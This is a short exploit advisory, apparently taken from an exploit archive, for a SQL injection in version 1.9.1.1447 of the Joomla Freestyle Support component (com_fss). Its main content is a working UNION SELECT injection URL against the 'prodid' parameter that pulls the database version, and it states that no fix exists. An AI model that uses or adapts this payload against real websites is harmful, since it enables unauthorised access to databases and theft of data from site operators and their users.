Joomla Freestyle Support 1.9.1.1447 (com_fss) SQL Injection

2012-10-19 17:05:05

Exploit Title: Joomla Freestyle Support com_fss sqli

Dork: N/A

Date: [17-10-2012]

Author: Daniel Barragan "D4NB4R"

Twitter: @D4NB4R

Vendor: http://freestyle-joomla.com

Version: Version 1.9.1.1447 (last update on Oct 15, 2012)

License: Commercial

Download: http://freestyle-joomla.com/fssdownloads

Tested on: [Linux(bt5)-Windows(7ultimate)]

Especial greetz: Pilot, _84kur10_, nav, dedalo, devboot, ksha, shine, p0fk, the_s41nt


Descripcion joomla component:

Advanced ticketed support/help desk on your website. Includes Knowledge Base, FAQs, Announcements, Glossary, Tickets by Email, Testimonials and many other features. Robust, customizable, professional, affordable and easy to use.

Warning: Invalid argument supplied for foreach() in


Exploit:


SQL : SQL injection

http://127.0.0.1/index.php?option=com_fss&view=test&prodid=777777.7'+union+all+select+77777777777777%2C77777777777777%2C77777777777777%2Cversion()%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777--+D4NB4R


_____________________________________________________
Daniel Barragan "D4NB4R" 2012

Fixes

No fixes

In order to submit a new fix you need to be registered.